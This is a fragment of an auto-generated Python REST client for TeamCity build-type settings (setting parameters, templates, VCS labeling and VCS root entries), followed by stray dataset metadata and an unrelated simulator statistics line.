response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_2_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_2 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_2_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_2" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_2`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_type_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_type_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param Type body:
:return: Type
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_type`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_type`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/type', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Type', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_type_raw_value_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_type_raw_value # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_type_raw_value_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_type_raw_value" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_type_raw_value`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_type_raw_value`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/type/rawValue', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_value_long_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_value_long # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_value_long_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_value_long" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_value_long`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_value_long`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/value', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_value_long_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_value_long_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_value_long_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_value_long_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_value_long_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_value_long_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}/value', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameters_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameters_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameters_0_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameters_0_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameters_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameters_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_templates_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_templates_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param BuildTypes body:
:param bool optimize_settings:
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'optimize_settings', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_templates" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'optimize_settings' in params:
query_params.append(('optimizeSettings', params['optimize_settings'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/templates', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildTypes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_vcs_labeling_options_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_vcs_labeling_options # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_vcs_labeling_options_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param VcsLabeling body:
:return: VcsLabeling
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_vcs_labeling_options" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_vcs_labeling_options`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcsLabeling', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsLabeling', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __update_vcs_root_entry_with_http_info(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""update_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__update_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:param VcsRootEntry body:
:param str fields:
:return: VcsRootEntry
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'vcs_root_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_vcs_root_entry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `update_vcs_root_entry`") # noqa: E501
# verify the required parameter 'vcs_root_locator' is set
if ('vcs_root_locator' not in params or
params['vcs_root_locator'] is None):
raise ValueError("Missing the required parameter `vcs_root_locator` when calling `update_vcs_root_entry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'vcs_root_locator' in params:
if isinstance(params['vcs_root_locator'], TeamCityObject):
path_params['vcsRootLocator'] = params['vcs_root_locator'].locator_id
else:
path_params['vcsRootLocator'] = params['vcs_root_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsRootEntry', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __update_vcs_root_entry_checkout_rules_with_http_info(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""update_vcs_root_entry_checkout_rules # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__update_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'vcs_root_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_vcs_root_entry_checkout_rules" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `update_vcs_root_entry_checkout_rules`") # noqa: E501
# verify the required parameter 'vcs_root_locator' is set
if ('vcs_root_locator' not in params or
params['vcs_root_locator'] is None):
raise ValueError("Missing the required parameter `vcs_root_locator` when calling `update_vcs_root_entry_checkout_rules`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'vcs_root_locator' in params:
if isinstance(params['vcs_root_locator'], TeamCityObject):
path_params['vcsRootLocator'] = params['vcs_root_locator'].locator_id
else:
path_params['vcsRootLocator'] = params['vcs_root_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}/checkout-rules', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.385445
| 224
| 0.608317
| 57,847
| 510,655
| 5.075648
| 0.00484
| 0.059926
| 0.028354
| 0.028691
| 0.992258
| 0.990743
| 0.98999
| 0.986843
| 0.984694
| 0.982916
| 0
| 0.013987
| 0.298419
| 510,655
| 12,338
| 225
| 41.388799
| 0.805547
| 0.27479
| 0
| 0.840966
| 1
| 0
| 0.213864
| 0.055739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032612
| false
| 0
| 0.004718
| 0
| 0.086317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
455199a498d300b4645fc0b3734da54bee4fb8c0
| 4,026
|
py
|
Python
|
NippoKun/report/tests/test_search.py
|
KIKUYA-Takumi/Nippokun
|
aa82f97aaf5b61d94b213425f28314a248914eb9
|
[
"MIT"
] | null | null | null |
NippoKun/report/tests/test_search.py
|
KIKUYA-Takumi/Nippokun
|
aa82f97aaf5b61d94b213425f28314a248914eb9
|
[
"MIT"
] | 4
|
2016-10-19T00:23:21.000Z
|
2016-11-04T01:29:08.000Z
|
NippoKun/report/tests/test_search.py
|
KIKUYA-Takumi/NippoKun
|
aa82f97aaf5b61d94b213425f28314a248914eb9
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.models import User
from django.db.models import Q
from django.test import TestCase, Client, RequestFactory
from ..models import Report
# Create your tests here.
class SearchTest(TestCase):
def setUp(self):
self.client = Client()
self.client.post('/report/user_register/',
{'username': 'john',
'password1': 'johnpass',
'password2': 'johnpass'})
self.client.login(username='john', password='johnpass')
request_factory = RequestFactory()
self.request = request_factory.get('/report/mypage/')
self.request.user = User.objects.get(pk=1)
self.client.post('/report/report_entries/',
{'report_author': self.request.user,
'report_title': 'test title',
'report_content': 'test'
})
self.client.post('/report/report_entries/',
{'report_author': self.request.user,
'report_title': 'search test',
'report_content': 'search'
})
def test_search_one_word(self):
query_search_word = 'search'
search_words = query_search_word.split()
search_reports = []
for i in range(len(search_words)):
search_reports += Report.objects.filter(Q(report_content__contains=search_words[i]))
count = len(search_reports)
self.assertEqual(count, 1)
def test_search_many_words(self):
query_search_word = 'test search'
search_words = query_search_word.split()
search_reports = []
for i in range(len(search_words)):
search_reports += Report.objects.filter(Q(report_content__contains=search_words[i]))
count = len(search_reports)
self.assertEqual(count, 2)
def test_search_no_hit_word(self):
query_search_word = 'python'
search_words = query_search_word.split()
search_reports = []
for i in range(len(search_words)):
search_reports += Report.objects.filter(Q(report_content__contains=search_words[i]))
count = len(search_reports)
self.assertEqual(count, 0)
class SearchReportsTest(TestCase):
def setUp(self):
self.client = Client()
self.client.post('/report/user_register/',
{'username': 'john',
'password1': 'johnpass',
'password2': 'johnpass'})
self.client.login(username='john', password='johnpass')
request_factory = RequestFactory()
self.request = request_factory.get('/report/mypage/')
self.request.user = User.objects.get(pk=1)
self.client.post('/report/report_entries/',
{'report_author': self.request.user,
'report_title': 'test title',
'report_content': 'test'
})
self.client.post('/report/report_entries/',
{'report_author': self.request.user,
'report_title': 'search test',
'report_content': 'search'
})
self.client.post('/report/report_entries/',
{'report_author': self.request.user,
'report_title': 'search ',
'report_content': 'This is search '
})
"""
status_code = 302: created new score.
status_code = 200: not create new score.
"""
def test_search(self):
query_search_word = 'search'
search_words = query_search_word.split()
search_reports = []
for i in range(len(search_words)):
search_reports += Report.objects.filter(Q(report_content__contains=search_words[i]))
count = len(search_reports)
self.assertEqual(count, 2)
| 39.470588
| 96
| 0.55539
| 404
| 4,026
| 5.309406
| 0.188119
| 0.061538
| 0.055944
| 0.065268
| 0.82704
| 0.814452
| 0.814452
| 0.814452
| 0.814452
| 0.814452
| 0
| 0.005946
| 0.331595
| 4,026
| 101
| 97
| 39.861386
| 0.791156
| 0.005713
| 0
| 0.807229
| 0
| 0
| 0.157381
| 0.040822
| 0
| 0
| 0
| 0
| 0.048193
| 1
| 0.072289
| false
| 0.072289
| 0.048193
| 0
| 0.144578
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4556262c411e8756d43acd6b2df49f6184b42cab
| 101
|
py
|
Python
|
veriloggen/fsm/__init__.py
|
akmaru/veriloggen
|
74f998139e8cf613f7703fa4cffd571bbf069bbc
|
[
"Apache-2.0"
] | 232
|
2015-09-01T16:07:48.000Z
|
2022-03-28T14:53:28.000Z
|
veriloggen/fsm/__init__.py
|
akmaru/veriloggen
|
74f998139e8cf613f7703fa4cffd571bbf069bbc
|
[
"Apache-2.0"
] | 34
|
2015-08-21T09:13:03.000Z
|
2022-03-21T23:52:44.000Z
|
veriloggen/fsm/__init__.py
|
akmaru/veriloggen
|
74f998139e8cf613f7703fa4cffd571bbf069bbc
|
[
"Apache-2.0"
] | 46
|
2015-09-24T14:39:57.000Z
|
2022-02-23T21:59:56.000Z
|
from __future__ import absolute_import
from __future__ import print_function
from .fsm import reset
| 20.2
| 38
| 0.861386
| 14
| 101
| 5.5
| 0.571429
| 0.25974
| 0.415584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128713
| 101
| 4
| 39
| 25.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
455ab043ca617ad4f4b606687e9a9fc210b24170
| 578
|
py
|
Python
|
src/sst/elements/simpleElementExample/tests/subcomponent_tests/legacy/refFiles/test_sc_legacy_2nn.py
|
Xiaoyang-Lu/sst-elements
|
7946241e9f5a57a0bfdbfbf8452deacb1c3a9051
|
[
"BSD-3-Clause"
] | null | null | null |
src/sst/elements/simpleElementExample/tests/subcomponent_tests/legacy/refFiles/test_sc_legacy_2nn.py
|
Xiaoyang-Lu/sst-elements
|
7946241e9f5a57a0bfdbfbf8452deacb1c3a9051
|
[
"BSD-3-Clause"
] | null | null | null |
src/sst/elements/simpleElementExample/tests/subcomponent_tests/legacy/refFiles/test_sc_legacy_2nn.py
|
Xiaoyang-Lu/sst-elements
|
7946241e9f5a57a0bfdbfbf8452deacb1c3a9051
|
[
"BSD-3-Clause"
] | null | null | null |
Loader0:mySubComp[0]:mySubCompSlot.numSent : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
